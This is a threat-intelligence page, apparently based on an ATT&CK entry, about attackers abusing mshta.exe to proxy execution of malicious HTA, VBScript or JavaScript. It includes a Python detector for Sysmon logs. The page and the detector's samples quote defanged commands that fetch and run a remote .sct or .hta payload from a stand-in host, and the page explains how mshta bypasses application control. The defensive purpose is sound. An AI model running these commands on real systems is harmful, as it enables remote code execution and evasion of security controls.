System Binary Proxy Execution: Mshta
Created on Saturday 04 March 2023. Updated 1 year, 2 months ago.
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies as Internet Explorer, but outside of the browser.
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings.
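One way to flag both invocation forms in process-creation logs, as an added example that is not part of the original page. The event field names follow Sysmon Event ID 1; the `classify` function, the reason labels and the sample events are constructed for illustration, and the defanged command lines are the ones quoted above.

```python
import re

# Heuristics for the two mshta.exe invocation forms described above.
# The lookbehind keeps "script:" from matching inside "vbscript:"/"javascript:".
INLINE_SCRIPT = re.compile(r"(?<![a-z])(?:vbscript|javascript)\s*:", re.I)
SCRIPTLET = re.compile(r"(?<![a-z])script\s*:", re.I)  # GetObject("script:...") moniker
REMOTE_URL = re.compile(r"https?://", re.I)


def refang(text):
    """Undo report-style defanging (http[:]//, payload[.]hta) before matching."""
    return text.replace("[:]", ":").replace("[.]", ".")


def is_mshta(event):
    """True when the image basename of the process-creation event is mshta.exe."""
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1]
    return image.lower() == "mshta.exe"


def classify(event):
    """Return the reasons an event looks like mshta proxy execution ([] if none)."""
    if not is_mshta(event):
        return []
    cmd = refang(event.get("CommandLine", ""))
    reasons = []
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline-script")
    if SCRIPTLET.search(cmd):
        reasons.append("scriptlet-moniker")
    if REMOTE_URL.search(cmd):
        reasons.append("remote-url")
    return reasons


# Constructed sample events; the first two reuse the command lines from the page.
MSHTA = r"C:\Windows\System32\mshta.exe"
SAMPLES = [
    {"Image": MSHTA, "CommandLine":
     'mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))'},
    {"Image": MSHTA, "CommandLine": "mshta http[:]//webserver/payload[.]hta"},
    {"Image": MSHTA, "CommandLine": "mshta javascript:close()"},
    {"Image": MSHTA, "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe http://webserver/readme.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(classify(ev), "<-", ev["CommandLine"])
```

A local .hta launched by mshta.exe returns no reasons here, so legitimate HTA use in an environment needs its own baseline rather than this heuristic.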
Technique Identifier
Technique Tags
Defense Evasion, mshta.exe, Microsoft HTML Applications (HTA) files, JavaScript, VBScript, mshta http[:]//webserver/payload[.]hta, mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")), bypass application control, bypass browser security settings, APT29, APT32, execute malicious scripts